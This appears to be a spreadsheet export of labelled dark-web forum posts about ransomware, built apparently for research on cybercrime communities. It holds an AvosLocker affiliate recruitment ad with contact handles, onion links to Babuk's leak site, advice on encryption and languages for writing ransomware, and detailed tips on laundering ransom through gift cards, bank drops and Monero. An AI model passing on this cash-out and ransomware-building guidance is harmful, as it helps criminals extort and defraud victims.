are not an entry point for bad actors attempting to interfere with elections. cyberdefenses also alleviates some of the burden by defining policies that counties can extend to their supplier network; fundamentals that must be met in order to remain a partner." cyberdefenses also uses spycloud's data to research the infrastructure used in election fraud campaigns.;;"we are all too aware of foreign attempts to undermine the sanctity of u.s. elections, and we're proud to do our part with cyberdefenses to help stop them," douglas lingenfelter, director of spycloud's federal practice, said in the release. "unfortunately, criminals are relentless and innovative in their attacks, so we are constantly updating our data and methods to help election officials stay ahead."</t>
  </si>
  <si>
    <t>news article on american securities companies aiming to monitor dark web for stolen election data including data from ransomware attacks</t>
  </si>
  <si>
    <t>28/10/2020 13:51</t>
  </si>
  <si>
    <t>df17579b7c8d5521e4ca</t>
  </si>
  <si>
    <t>Austin Security Companies Team Up To Monitor The Dark Web for Stolen Election and Political Data</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;u.s. and bulgarian authorities this week took control of the dark web site used by the netwalker ransomware cybercrime group to publish data stolen from its victims.;;"we are striking back against the growing threat of ransomware by not only bringing criminal charges against the responsible actors, but also disrupting criminal online infrastructure and, wherever possible, recovering ransom payments extorted from victims," said acting assistant attorney general nicholas l. mcquaid of the justice department's criminal division.;;"ransomware victims should know that coming forward to law enforcement as soon as possible after an attack can lead to significant results like those achieved in today's multi-faceted operation." in connection with the takedown, a canadian national named sebastien vachon-desjardins from the city of gatineau was charged in the u.s. state of florida for extorting $27.6 million in cryptocurrency from ransom payments.;;separately, the bulgarian national investigation service and general directorate combating organized crime seized a dark web hidden resource used by netwalker ransomware affiliates ��� i.e., cybercrime groups responsible for identifying and attacking high-value victims using the ransomware ��� to provide payment instructions and communicate with victims.;;visitors to the website will now be greeted by a seizure banner notifying them that it has been taken over by law enforcement authorities.;;chainalysis, which aided in the investigation, "traced more than $46 million worth of funds in netwalker ransoms since it first came on the scene in august 2019," adding "it picked up steam in mid-2020, growing the average ransom to $65,000 last year, up from $18,800 in 2019.";;in recent months, netwalker emerged as a popular choice of ransomware strain besides ryuk, maze, doppelpaymer, and sodinokibi, with numerous companies, municipalities, hospitals, schools, and universities targeted by the cybercriminals to extort victims.;;before the takedown, the netwalker administrator, who goes by the moniker "bugatti" on darknet forums, is said to have posted an advertisement in may 2020 looking for additional russian-speaking affiliates as part of a transition to a ransomware-as-a-service (raas) model, using the partners to compromise targets and steal data before encrypting the files.;;the netwalker operators have also been part of a growing ransomware trend called double extortion, where the attackers hold the stolen data hostage and threaten to publish the information should the target refuse to pay the ransom. "after a victim pays, developers and affiliates split the ransom," the u.s. department of justice (doj) said.;;chainalysis researchers suspect that besides involving in at least 91 attacks using netwalker since april 2020, vachon-desjardins worked as an affiliate for other raas operators such as sodinokibi, suncrypt, and ragnarlocker.;;the netwalker disruption comes on the same day that european authorities announced a coordinated takedown targeting the emotet crimeware-as-a-service network. the botnet has been used by several cybercrime groups to deploy second-stage malware ��� most notably ryuk and tri</t>
  </si>
  <si>
    <t>news article on bulgarian authorities seizing netwalker dark web site</t>
  </si>
  <si>
    <t>3f7d0f47e8cc40fed65f</t>
  </si>
  <si>
    <t>Authorities Seize Dark-Web Site Linked to the Netwalker Ransomware</t>
  </si>
  <si>
    <t>{'ransomware': 6, 'raas': 1}</t>
  </si>
  <si>
    <t>so you're publicly announcing an extortion attempt and warning people not to buy because you intend to snitch them out? with no further information or justification?</t>
  </si>
  <si>
    <t>Posts disputing a supposed extortion attempt, statements of the original user lying</t>
  </si>
  <si>
    <t>cc619bdcdaae76288340</t>
  </si>
  <si>
    <t>Avoid vendor striphouseusa</t>
  </si>
  <si>
    <t>0 days 01:14:00</t>
  </si>
  <si>
    <t>0 days 03:46:00</t>
  </si>
  <si>
    <t>he joined one hour ago just to post this too..</t>
  </si>
  <si>
    <t>/u/samadams123</t>
  </si>
  <si>
    <t>this is the second alt this prick has used to attack this vendor (;/u/anondev7;) a total of 14 posts so far from this lying  little shit</t>
  </si>
  <si>
    <t>/u/plkqcs</t>
  </si>
  <si>
    <t>avoslocker ransomware is looking for new affiliates.;;;features:;- encrypt all drives &amp; network shares (hidden or not);- multi-threaded encryption process;- fail-proof;- overwrite files instead of creating copies:;files are encrypted &amp; overwritten in blocks, causing no memory issues while proving to be way more efficient, as the original files do not need to be overwritten before deletion.;- delete shadow copies/backups;- proper memory cleaning of cryptography keys:;memory is cleansed of any keys that may be used in decryption right after each file is encrypted. no trace of decryption keys will be found in memory.;- written in c++;- low detection rates;- compatible with all crypters/evading methods;- other applications interfering with encryption are terminated instantly;-  large file support;;after you infect the target, we take care of negotiation, hosting of leaks, publishing it on our blog and so on. payments are strictly done through monero.;;our services (affiliate panel, payment, blog) are strictly hosted in tor.;;you may apply for an invite through my;xmpp: avos@thesecure.biz;tox: 9a751ac90a5f020521ee40d58208c272bd18d2e0c934ab6da9b918627578095cd9847e24ce59</t>
  </si>
  <si>
    <t>AvosLocker asking for affiliates</t>
  </si>
  <si>
    <t>hacker (group)</t>
  </si>
  <si>
    <t>/u/avos</t>
  </si>
  <si>
    <t>26/06/2021 19:49</t>
  </si>
  <si>
    <t>ef5f80c705df9a407db3</t>
  </si>
  <si>
    <t>AvosLocker - Ransomware [ACCEPTING AFFILIATES]</t>
  </si>
  <si>
    <t>1 days 01:44:00</t>
  </si>
  <si>
    <t>so just to give everyone an update, the user;/u/hiiipower420;who decided to stir up shit and try and reignite an already handled situation decided his next best bet was to change user names and try and claim some false shit he has no info of, to try and extort us for $$$.... this is far from the first time we have received threats and extortion attempts... just a heads up, not only will they never work but making up shit does not intimidate us...;;as many hopefully already know, the dread admins do not get involved with drama, however they will do what they can to protect vendors and users alike.. if they have proof of a corrupt vendor, they will remove them, if they have proof of a corrupt user, they will ban them... so trying to be slick will end up the same exact way every time...;;within 6 minutes of receiving this message the user was banned and his alternate username banned as well... i am just here to pass along the info. thank you;/u/hugbunter;for continuing to run this place the way it should and treating all as fairly as possible. your contributions to this community go a long way, and though everyone might not love you, you deserve the credit and do a great job.;;;stupid fucking twat attempt;</t>
  </si>
  <si>
    <t>Posts confirming that a user who attempted to publish information from a supposed extortion attempt was indeed lying</t>
  </si>
  <si>
    <t>debate / information (provider)</t>
  </si>
  <si>
    <t>/u/HumboldtGrowersPR</t>
  </si>
  <si>
    <t>19/11/2018 22:21</t>
  </si>
  <si>
    <t>/d/DankNation</t>
  </si>
  <si>
    <t>c08cbb7bf2cbc7674da3</t>
  </si>
  <si>
    <t>Awful extortion attempts LMAO</t>
  </si>
  <si>
    <t>0 days 23:38:00</t>
  </si>
  <si>
    <t>security;woman dies after hospital is unable to treat her during crippling ransomware infection, cops launch probe;extortionware is bad but it never killed anyo... never mind;fri 18 sep 2020 // 05:55 utc;shaun nichols in san francisco;;a woman in germany died after a ransomware infection prevented her hospital from giving her emergency treatment.;;the unnamed patient died en route to a hospital in another city after she was unable to get treatment in d��sseldorf due to the malware affecting computer systems. a manslaughter investigation is now underway against the ransomware's operators, who have yet to be identified.;;in their very, very thin defense, the crooks behind the file-scrambling nasty turned over the decryption key to the cops when they were informed they had hit a hospital with their crimeware. since then, the operators have gone dark. chances are they are not in germany and there's not much hope for an arrest and extradition.;;university hospital d��sseldorf said that due to a ransomware hat has crippled its systems for more than a week, it is unable to take emergency patients. in this case, the woman had to go to another hospital 20 miles away, and did not live through the hour-long wait to see a doctor.;;the hospital said it was infected via a vulnerability in one of the software suites it uses, something that should be a very, very loud warning to admins at hospitals around the world: patch everything as soon as you can. the name of the software and the vulnerable versions were not given, though hopefully this info is being disclosed confidentially to other hospitals and clinics.;;"according to information from the public prosecutor's office and the ministry of justice, the police, in cooperation with external specialists and the clinic's it specialists, have now identified specific indications of the cause. according to these analyzes, the background to the failure is a hacker attack that exploited a weak point in an application," the hospital said on thursday via a translator.;;"the security vulnerability was found in a commercial add-on software that is customary on the market and distributed worldwide.";;even having the decryption key, it is going to take the hospital some time to get its entire network back up and running. in the meantime, it is not able to take any emergency patients.;;"due to the size of the it system and the abundance of data, we cannot yet estimate when this process will be completed," said hospital commercial director ekkehard zimmer.;;"however, we are confident that we will be able to better estimate the time span in the next few days and then be there for our patients again step by step.";;some ransomware slingers have promised not to hit hospitals. in this case, it is claimed the operators did not realize what they had infected. the hospital is affiliated with the university of d��sseldorf, and it is believed the crooks thought they were shutting down the school's network, not the life-saving facilities of a hospital. hopefully they get a chance to make that argument in front of a german judge</t>
  </si>
  <si>
    <t>Post labelling times ransomware has influence the ability to care for someone resulting in the loss of their life despite many groups stating they would not attack hospitals durng the pandemic. Post almost praises this</t>
  </si>
  <si>
    <t>news / debate</t>
  </si>
  <si>
    <t>20/09/2020 19:00</t>
  </si>
  <si>
    <t>/d/dsmarket</t>
  </si>
  <si>
    <t>d934b357564af9ebd170</t>
  </si>
  <si>
    <t>BEST CRYPTOLOCKER BOTNET! Ready to heist dem all coins?</t>
  </si>
  <si>
    <t>0 days 00:09:00</t>
  </si>
  <si>
    <t>that makes you feel good? special?;;a hospital was unable to take emergency patients because of this ransomware. a hospital.;;if that's your reaction, then i sincerely hope somebody you love gets redirected from the closest hospital in an emergency because some dipshit like yourself holds it to ransom.;;nothing to be proud of.;;go the extra mile to exclude underfunded emergency services from your ransomware you lackwits.</t>
  </si>
  <si>
    <t>Post disputing the opinions of the previous poster, stating ransomwae affecting a hospitals ability to care for paitients a bad thing</t>
  </si>
  <si>
    <t>20/09/2020 19:31</t>
  </si>
  <si>
    <t>0 days 00:12:00</t>
  </si>
  <si>
    <t>anyone happen to have the onion link to the recent babuk ransomware breach?</t>
  </si>
  <si>
    <t>User asking for onion link for the recent babuk ransomware breach</t>
  </si>
  <si>
    <t xml:space="preserve">information (request) </t>
  </si>
  <si>
    <t>/u/bytebanshee1</t>
  </si>
  <si>
    <t>0dbe77bf0265e50a33c4</t>
  </si>
  <si>
    <t>Babuk Ransomware Site</t>
  </si>
  <si>
    <t>0 days 00:51:00</t>
  </si>
  <si>
    <t>http://wavbeudogz6byhnardd2lkp2jafims3j7tj6k6qnywchn2csngvtffqd.onion/</t>
  </si>
  <si>
    <t>User providing link for the recent babuk ransomware breach</t>
  </si>
  <si>
    <t>after announcing their exit from the ransomware business in favor of data theft extortion, the babuk gang appears to have slipped back into their old habit of encrypting corporate networks.;;the criminals are currently using a new version of their file-encrypting malware and have moved the operation to a new leak site that lists a handful of victims;;the babuk ransomware group became known at the beginning of the year but the gang says that their attacks had started in mid-october 2020, targeting companies across the world and demanding ransoms of $60,000-$85,000 in bitcoin cryptocurrency.;;one of their most publicized victims is the washinton dc's metropolitan police department (mpd). this attack likely pushed the threat actor into announcing its retirement from the ransomware business only to adopt another extortion model that did not include encryption.;;the gang also announced plans to release their malware so that other cybercriminals could start a ransomware-as-a-service operation. the threat actor kept its promise and published its builder, a tool that generates customized ransomware.;;security researcher kevin beaumont found it on virustotal and shared the information to help the infosec community with detection and decryption.;;after shutting down in april, the gang took the name payload bin, but their leak site shows little activity. instead, a new leak site emerged on the dark web carrying the babuk ransomware markings.;;the site lists fewer than five victims that refused to pay the ransom and that they have been attacked with a second version of the malware.;;it appears that babuk has not given up the encryption-based extortion game. they released only the old version of their malware and created a new one to get back into the ransomware business.;;the gang made this clear in a comment to our article about a rush of ransomware attacks that used the leaked babuk builder and demanded .006 bitcoins (currently about $200) - clearly showing that it���s not the original group using"only the old version was published. the new version is still used for corporate networks.";;it appears that the babuk gang is not ready to give up the file-encryption activity and will continue to focus on corporate networks for larger payments.;;it is unclear what drove the group to return to their old practices but given how empty the payload bin leak site is, one can speculate that data theft extortion did not go too well.;;also, it remains unknown at the moment if the new babuk operation has behind it the same members that attacked washinton dc's metropolitan police department or this incident produced a split.</t>
  </si>
  <si>
    <t>Post on Babuk ransomware gang attack</t>
  </si>
  <si>
    <t>information (provider) / news</t>
  </si>
  <si>
    <t>/u/Alarin</t>
  </si>
  <si>
    <t>677a87b9e775e34d1ee1</t>
  </si>
  <si>
    <t>Babuk ransomware is back, uses new version on corporate networks</t>
  </si>
  <si>
    <t>2 days 09:22:00</t>
  </si>
  <si>
    <t>{'extortion': 3, 'ransomware': 6}</t>
  </si>
  <si>
    <t>this reminded me of their statement i;posted;five months ago, for a treath actor these guys are fucking hilarious.</t>
  </si>
  <si>
    <t>0 days 00:07:00</t>
  </si>
  <si>
    <t>my father owns a small business so i bought a copy of zonealarm anti-ransomwear. it has a built in honeypot system that puts random files all over the hdd of the computer and if it catches something accessing it for some reason, it will halt all executables from running. it also backs up important files to the cloud so if anything gets encrypted, you can recover it.;;;check point zonealarm anti-ransomware review;;along with that i already have  webroot secureanywhere installed, along with malwarebytes. so, hopefully with all the heuristics it should be enough to stop any zero day ransomwear from getting in.</t>
  </si>
  <si>
    <t>Post from user promoting their review for an anti-ransomeware software</t>
  </si>
  <si>
    <t>/u/StarScream999</t>
  </si>
  <si>
    <t>i have created the bukkake ransomware to lock up all your porn &amp; it also prevents you from accessing any new porn!!!!;;pay up or wack it to the sears catalog!!!!;;baawweerrrreeewwweee!!!!!</t>
  </si>
  <si>
    <t>Post promoting a new ransomware</t>
  </si>
  <si>
    <t>0 days 01:26:00</t>
  </si>
  <si>
    <t>babadookdookdook</t>
  </si>
  <si>
    <t>Other</t>
  </si>
  <si>
    <t>/u/Umpalumpa</t>
  </si>
  <si>
    <t>unable to locate their leaks site.;anyone have a link?</t>
  </si>
  <si>
    <t>Post asking for babuk leak site</t>
  </si>
  <si>
    <t>/u/SomethingProfound</t>
  </si>
  <si>
    <t>0 days 17:21:00</t>
  </si>
  <si>
    <t>you can find the leak on github</t>
  </si>
  <si>
    <t>Post suggesting babuk leak site information can be found on github</t>
  </si>
  <si>
    <t>/u/venom999</t>
  </si>
  <si>
    <t>0 days 08:35:00</t>
  </si>
  <si>
    <t>they changed their name to payload.bin http://wavbeudogz6byhnardd2lkp2jafims3j7tj6k6qnywchn2csngvtffqd.onion/</t>
  </si>
  <si>
    <t>Post providing babuk leak site</t>
  </si>
  <si>
    <t>/u/PR0M3TH3USC0MPL3X</t>
  </si>
  <si>
    <t>1 days 04:12:00</t>
  </si>
  <si>
    <t>declared they won't attack the following:;;hospitals: except private plastic surgery clinics, private dental clinics;;non-profit: any non-profitable charitable foundation (except the foundations who help lgbt and blm);;schools: except the major universities;;small business: companies with annual revenue less than 4 mln$;;it's safe to say babyk doesn't like gay black people, lol.</t>
  </si>
  <si>
    <t>Post discussing babuk's rules</t>
  </si>
  <si>
    <t>e30fa146369ab6750acf</t>
  </si>
  <si>
    <t>Babyk Randsomware</t>
  </si>
  <si>
    <t>0 days 03:04:00</t>
  </si>
  <si>
    <t>honestly, nowdays it's rarely possible to pinpoint exact location.;i personally think this is just a way for them to throw people of the trail because ransomware operators don't give a fuck who they hit as long as they get payed at the end of the day.</t>
  </si>
  <si>
    <t>0 days 00:52:00</t>
  </si>
  <si>
    <t>out of curiosity, when talking about hacking for profit what comes to mind?;;when people are starting out in the space where is the first place they usually go to make their first bit of money off of hacking? something like a phishing attack, or getting access to a weak database?;;what are your thoughts and experiences on this?</t>
  </si>
  <si>
    <t>User asking what people think of when asked 'hacking for profit' and what do people new to the space typically do first</t>
  </si>
  <si>
    <t>/u/gmxxx</t>
  </si>
  <si>
    <t>4633e6ed8afe5f0fb88c</t>
  </si>
  <si>
    <t>Beginning Hacking for Profit</t>
  </si>
  <si>
    <t>0 days 06:13:00</t>
  </si>
  <si>
    <t>ransomware</t>
  </si>
  <si>
    <t>Post responding to the above post with the answer ransomware</t>
  </si>
  <si>
    <t>/u/mrAlien0</t>
  </si>
  <si>
    <t>0 days 00:37:00</t>
  </si>
  <si>
    <t>belarus law enforcement have arrested an alleged gandcrab ransomware operator;http://tapeucwutvne7l5o.onion/belarus-authorities-apprehend-gandcrab-ransomware-operator</t>
  </si>
  <si>
    <t>Post about belarus law enforcement arresting a alleged ransomware operator</t>
  </si>
  <si>
    <t>/u/Xenus</t>
  </si>
  <si>
    <t>/d/Tape</t>
  </si>
  <si>
    <t>3c2a2453bcdf67b58aaa</t>
  </si>
  <si>
    <t>Belarus Authorities Apprehend GandCrab Ransomware Operator</t>
  </si>
  <si>
    <t>;for the more detailed version including images visit;chronos;;belarusian authorities have seized the servers of a notorious hacking forum that served as a meeting place for malware authors, hackers, spammers, botnet operators, and other cyber-criminals, the belarusian ministry of internal affairs said in a press release.;;;;named xakfor, the forum launched in 2012 and targeted the russian-speaking cybercrime scene. it operated on the open internet, and not on the dark web, as most would have expected, a reason many now believe led to its demise.;;belarusian authorities said xakfor amassed more than 28,000 registered accounts and had thousands of daily active users before it was taken down last month.;;;a meeting place for newbie hackers;while initially the forum launched and worked as a closed invite-only community and attracted some of the russian hacking scene's top professionals, with time, the forum's policy changed, opening registrations to all users.;;the forum's reputation changed accordingly, and in the past half-decade, xakfor became the russian version of hackforums -- an english-speaking forum populated by low-skilled hackers.;;yet, while hackforums began moderating some of its content in recent years -- removing ads for some types of malware and cybercrime services -- xakfor did not.;;the site listed a variety of content, ranging in quality. however, the site was primarily known as a place to buy or download free malware.;;per sources, xakfor users advertised or shared all sorts of malware strains on the forum, going from ransomware kits to crypters, to remote access trojans, and even android malware. some of the malware was authentic, some was cracked, while other was backdoored -- with criminal stealing from each other.;;its free and varied content was one of the reasons it attracted a crowd of newbie hackers looking to take their first steps in the malware scene, before moving to other more underground hacking forums.;;;it was never the-place-to-be;the site's popularity is what eventually led to its demise when belarusian officials discovered it was being hosted inside the country.;;the forum listed a takedown notice from belarusian authorities until this week, when it went down for good. several of the site's pages are still available indexed and cached in google, but all malware download links are now down and inaccessible.;;threat intel analysts with whom zdnet spoke never had a high opinion of the site, but they did admit it was one of the biggest, although not the "forum you need to keep an eye on." those are exploit, nulled, and verified.;;all in all, xakfor was never the place where hackers plotted huge malware operations, but it was a place where users shared malware, and lots of it.;;;credits: zdnet;</t>
  </si>
  <si>
    <t>Post about belarus law enforcement shutting down hacking forum</t>
  </si>
  <si>
    <t>/u/Chronos</t>
  </si>
  <si>
    <t>/d/Chronos</t>
  </si>
  <si>
    <t>c38742f26421e71cb73c</t>
  </si>
  <si>
    <t>Belarusian police shut down hacking forum 'XakFor'</t>
  </si>
  <si>
    <t>3 days 14:55:00</t>
  </si>
  <si>
    <t>bombo quesiton but which language should i use to write things like rats and ransomeware specifacly for windows x86. would c++ or c be a good option or should i go a bit lower like assembly, or is there another language i should choose. ik your gonna say "go what you are comfortable with" but what is "kinda standard practice"</t>
  </si>
  <si>
    <t>User asking what is the best language for creating rats/ransomware for windows</t>
  </si>
  <si>
    <t>/u/vlad1m1r</t>
  </si>
  <si>
    <t>22/03/2022 01:58</t>
  </si>
  <si>
    <t>ee898aa9fb79299b6645</t>
  </si>
  <si>
    <t>Best Language to write malware is</t>
  </si>
  <si>
    <t>9 days 11:24:00</t>
  </si>
  <si>
    <t>c, c++ are classic;golang for speed;there is no best language, the best is what gets the job at hand done.</t>
  </si>
  <si>
    <t>User responding with their opinion for the best language for rats/ransomware</t>
  </si>
  <si>
    <t>education (provider) / debate</t>
  </si>
  <si>
    <t>/u/WhiteWolf</t>
  </si>
  <si>
    <t>22/03/2022 02:08</t>
  </si>
  <si>
    <t>this.;;i learned python in about (6) months, created my own ransomware, and let it rip. i get most people laugh at that but i made a lof of money from it and i'm laughing all the way to the moon now.;;like @whitewolf said "the best is what gets the job at hand done".;;but most malware devs will tell you c/c++ and asm are the way to go.</t>
  </si>
  <si>
    <t>22/03/2022 16:06</t>
  </si>
  <si>
    <t>0 days 13:58:00</t>
  </si>
  <si>
    <t>i was asking this question myself also.;i think that assembler is really good for it. lots of malware, ransomware just "play" with the buffer overflow;so they try to overwrite the stackpointer and that's best done in assembler imo</t>
  </si>
  <si>
    <t>/u/AllForTheChicken</t>
  </si>
  <si>
    <t>22/03/2022 16:39</t>
  </si>
  <si>
    <t>c and only c, especially if you're targeting windows.;;there are others but you end up with compatibility or compilation problems, so it's just not worth using them.;;whilst assembly/low level is ideal, unless you're very confident in it you're going to run in to memory management issues or struggle to get it to do what you want.</t>
  </si>
  <si>
    <t>/u/overloadr</t>
  </si>
  <si>
    <t>23/03/2022 15:40</t>
  </si>
  <si>
    <t>0 days 23:01:00</t>
  </si>
  <si>
    <t>none......., coin washing for btc is a myth and if you see it with onion address its a scam.  i am trying to understand your issue for wanting to coin wash btc that your buying???  the methodology behind "coin washing" is to scramble the btc taken in wallet heist or ransomware payments when the wallet holding the btc has been flagged. the fact that your buying btc with xmr means the btc wallet will be clear of any flags so you can easily cash out your btc and be on your way;;now if you have tainted btc then that different issue and if you needed some guidance on that path i would gladly throw you some nuggets of direction;;happy hunting ovt</t>
  </si>
  <si>
    <t>User discussing the methodology behind coin washing, relating it to money gained from ransomware</t>
  </si>
  <si>
    <t>/u/overthetop</t>
  </si>
  <si>
    <t>27/04/2022 22:08</t>
  </si>
  <si>
    <t>/d/Monero</t>
  </si>
  <si>
    <t>e5c110bf55e4ecaf392b</t>
  </si>
  <si>
    <t>Best coin washing services and transfer monero to btc?</t>
  </si>
  <si>
    <t>0 days 02:08:00</t>
  </si>
  <si>
    <t>2 days 01:54:00</t>
  </si>
  <si>
    <t>currently coding a ransomware and reading a ransomware countering pdf to learn more.;i am barely understanding the encryption, people are telling me its a weak encryption method and weak cryptography.</t>
  </si>
  <si>
    <t xml:space="preserve">User asking for information on better encryption methods for ransomware </t>
  </si>
  <si>
    <t>/u/Opheseus</t>
  </si>
  <si>
    <t>5b077fc12766e1806652</t>
  </si>
  <si>
    <t>Best encryption method?</t>
  </si>
  <si>
    <t>0 days 19:51:00</t>
  </si>
  <si>
    <t>-hybrid encryption, encrypt the file with symmetric algorithm &gt; encrypt generated symmetric key with asymmetric algorithm, like (rsa-4096).;-random iv, salt, password/key to encrypt the file.;-delete the given password/key to encrypt the file from the mem</t>
  </si>
  <si>
    <t>User responding with hybrid-encryption</t>
  </si>
  <si>
    <t>/u/kolmteist</t>
  </si>
  <si>
    <t>0 days 02:46:00</t>
  </si>
  <si>
    <t>if you're not familiar with cryptography and encryption algorithms i highly recommend you not to write it unless you understand it 100% - a lot of ransomware families have been pwned by security researchers because they used either weak algorithms or misused secure ones.;;if you're interested in using a ransomware without spending months to code a proper one check out;/d/redeemer;. i'm the only coder and it should satisfy most features that you need from a ransomware. i can also share tips if you need them.</t>
  </si>
  <si>
    <t>User cautioning the original poster from creating their own raas service whilst they don't fully understand encryption techniques whilst plugging their own service as an alternative</t>
  </si>
  <si>
    <t>education (provider) / raas provider (group)</t>
  </si>
  <si>
    <t>0 days 17:05:00</t>
  </si>
  <si>
    <t>as usual there have been a lot of new markets in the past few years in my opinion cannazon and dream where the best markets of them all, simply because they had a incredibly strong team and i liked the actions and morals of the admins.;;empire is another big name and white house market, empire exit scammed and although white house technically didn't a lot of users weren't able to withdraw their coins in my eyes they did exit scam. right now monero is increasingly becoming more and more popular due to it's private nature although as you can imagine most people still hold more money in bitcoin.;;bitcoin's market value increased by a lot and other cryptocurrencies followed, ether is another on the rise.  when covid hit there was a major increase in users in all fields, also the darknet since covid kinda died down a lot of people left and the darknet hit a "low point".;;more and more people are advocating for only privacy, using linux, tor, vpn's, cryptocurrency and other privacy measures which is a good thing. there is currently a group going around in an attempt to de anonymize tor users.;;recently there was also a new white paper that described finger printing attacks against tor with a 90% accuracy rate when used on a few selected sites, and a 70% accuracy rate on a large number of sites. correlation attacks and such are also still a thing. tor is a good protocol, well designed but of course as with anything it still has flaws we cannot solely depend on tor. tor got banned in russia just a few weeks ago and they got a stronger internet regulation in january 2021.;;encryption is getting banned in a lot of countries and le is trying hard to crack down we have to look out more, everything is getting more sophisticated but so are we.;;i2p another anonymization network is becoming increasingly popular and we might soon see a shift from tor to i2p that is if the development on i2p increases since there's a lack of developers working on the project, p2p is also a topic of conversation in order to finally create a fully decentralized network and allow everyone to hide more.;;i think in a few years we'll shift to a fully decentralized p2p network and this will become the standard if only users see the benefit of it, because there's projects like openbazaar and partcli which have attempted this but failed to gain traction.;;ransomware also has been heavily on the rise and they're hitting hard and strong everyday! the future looks bright and i think in a few years we'll be even harder to catch and there'll be way more sophisticated solutions out there.</t>
  </si>
  <si>
    <t>Post discussing a vararity of markets</t>
  </si>
  <si>
    <t>/u/Sindosa</t>
  </si>
  <si>
    <t>27/12/2021 23:01</t>
  </si>
  <si>
    <t>35798f65a1afa778b4d4</t>
  </si>
  <si>
    <t>Best summary of the last 4 years?</t>
  </si>
  <si>
    <t>2 days 02:35:00</t>
  </si>
  <si>
    <t>if am successful with the use of my ransomware, what would be the best way to get paid? i did some reasearch on this and it seems like most popular are bitcoin payments, even though more and more ransomware hacking groups are moving toward monero payments only.;;so is monero the best? what about gift cards? gift cards are very popular with scammers and easy to buy for the victim, whereas monero is definitely much harder to buy. gift cards are usually fairly low value, like a maximum of $200, but you can always ask for 10 of them, so that's not really an issue.;;ultimately it all comes down to what is the easiest to cash out. monero or gift cards? i don't have this figured out yet, so i am going to brainstorm some ideas here. feel free to comment and point out any flaws.;;this is how i imagine gift cards can be cashed out:;;1. you actually use the gift cards. let's say they are amazon gift cards and you use them to buy some hot-selling items, like iphones, get them delivered to your address and then resell them.;;the problem i see here is that the gift cards are connected to your shipping address, so to be anonymous you would have to use a drop address. another problem is that shipping takes some time and if the person who paid you ransom in gift cards contacted le and they contacted amazon and amazon gave them the shipping address associated with the gift cards you are fucked and le can be waiting for you at the address - doesn't matter if it's a drop or not - and catch you when you're trying to pick up the packages. this method seems to be pretty terrible and impossible to be made safe.;;2. you don't use the gift cards, you sell them instead.;;this seems to be very simple at first, but when you delve into it deeper it get's complicated. let's say your victim pays you ransom in 10 $200 amazon gift cards. you then go on ebay and sell all of these gift cards to 10 different customers and they pay you via paypal. if the victim contacts le and tells them the codes from the gift cards and what store they are for (amazon), le can simply contact amazon and ask them to contact them when these specific codes from gift cards get used. the people that you sold to on ebay will soon use the gift cards on amazon, amazon will flag the purchases and contact le and share these people's shipping addresses with le. le will contact them, find out that they bought the gift cards on ebay, contact ebay to get details about the identity behind your ebay account and you are fucked because your ebay account is connected to your paypal account. so it seems like this method is also pretty terrible, but there is a way to make it safe. if you can use a paypal account that is not connected to your identity and know how to cash it out you are safe.;;this is how i imagine monero can be cashed out:;;1. actually, i haven't researched this enough. if anyone knows how to safely cash out monero let me know.;;to summarize this post: the best way to receive ransom is gift cards, if you know how to safely cash out paypal, or monero, if you know how to safely cash out monero.</t>
  </si>
  <si>
    <t>User asking for the best way to receive ransomware payments</t>
  </si>
  <si>
    <t xml:space="preserve">education (request) </t>
  </si>
  <si>
    <t>/u/DisgustingAnimal</t>
  </si>
  <si>
    <t>23/06/2022 12:32</t>
  </si>
  <si>
    <t>0590d1bb41b67736067b</t>
  </si>
  <si>
    <t>Best way to receive ransom from ransomware?</t>
  </si>
  <si>
    <t>3 days 10:32:00</t>
  </si>
  <si>
    <t>;;best way to receive ransom from ransomware?;;by;/u/disgustinganimal;���;4 months ago;in;/d/hacking;;1 points;���;</t>
  </si>
  <si>
    <t>23/06/2022 12:46</t>
  </si>
  <si>
    <t>/d/fraud</t>
  </si>
  <si>
    <t>f14a36b9f4aefe327211</t>
  </si>
  <si>
    <t>0 days 04:24:00</t>
  </si>
  <si>
    <t>i assume since you have a ransomware its more than one computer, you can try and get fullz and setup a bank drop to cashout the btc through any reseller like localbtc or coinbase or whatever u wanna use. convert the monero to btc using cackewallet or do some research to try n find and something better. i cannot say this enough tough, opsec opsec opsec!!!!!  this is a very simplified explination but i recommend you do alot of research beforehand.</t>
  </si>
  <si>
    <t>User provider their experence and information on the best way to receive ransomware payments</t>
  </si>
  <si>
    <t xml:space="preserve">education / information (provider) </t>
  </si>
  <si>
    <t>/u/ticklemyfancy</t>
  </si>
  <si>
    <t>23/06/2022 14:06</t>
  </si>
  <si>
    <t>0 days 01:34:00</t>
  </si>
  <si>
    <t>there's no easy answer to that, many companies don't reply or hire a professional negotiator or fbi to takeover, you have to remember to them; you're a terrorist. they're not going to allow themselves to be extorted easily.</t>
  </si>
  <si>
    <t>/u/DWdenizen777</t>
  </si>
  <si>
    <t>23/06/2022 14:32</t>
  </si>
  <si>
    <t>0 days 01:46:00</t>
  </si>
  <si>
    <t>re: cashing out giftcards, you can buy a paxful account registered on someone else's data, and sell your giftcards there for crypto. then launder your crypto to break the chain, and cash out your crypto to your preferred method.;;as for cashing out monero, just sell it for cash on localmonero or to;/u/elonmuskwhm;, who's the most popular exchanger on the site</t>
  </si>
  <si>
    <t>/u/yossarian</t>
  </si>
  <si>
    <t>23/06/2022 14:57</t>
  </si>
  <si>
    <t>how difficult would you say setting up a bank drop is? if i buy a bunch of tutorials from a dnm, will that teach me how to do that? or is clearnet a better place to learn that? i would appreciate if you pointed me in the right direction.</t>
  </si>
  <si>
    <t>User asking for more information on best way to receive ransomware payments</t>
  </si>
  <si>
    <t>education / information (request)</t>
  </si>
  <si>
    <t>23/06/2022 17:06</t>
  </si>
  <si>
    <t>0 days 02:09:00</t>
  </si>
  <si>
    <t>i'm not looking for any easy answers. they can be complicated. surely you can contribute something better than just "it's hard, be careful".</t>
  </si>
  <si>
    <t>23/06/2022 17:10</t>
  </si>
  <si>
    <t>0 days 02:38:00</t>
  </si>
  <si>
    <t>to comment on the paxful method - i could also just ask for a payment in crypto directly and completely bypass gift cards. but you are right that this method could be good if the ransomware victim doesn't know how to send me crypto, only gift cards.;;with regards to monero, how do you break the chain if you have to receive the cash to your address? or is it that because of the nature of the monero blockchain, if you move the monero around a few wallets it cannot be traced, so the cash that you receive for the sale from the last wallet cannot be linked to you, as an owner of the first wallet? correct me if i am misunderstanding this please.</t>
  </si>
  <si>
    <t>23/06/2022 17:18</t>
  </si>
  <si>
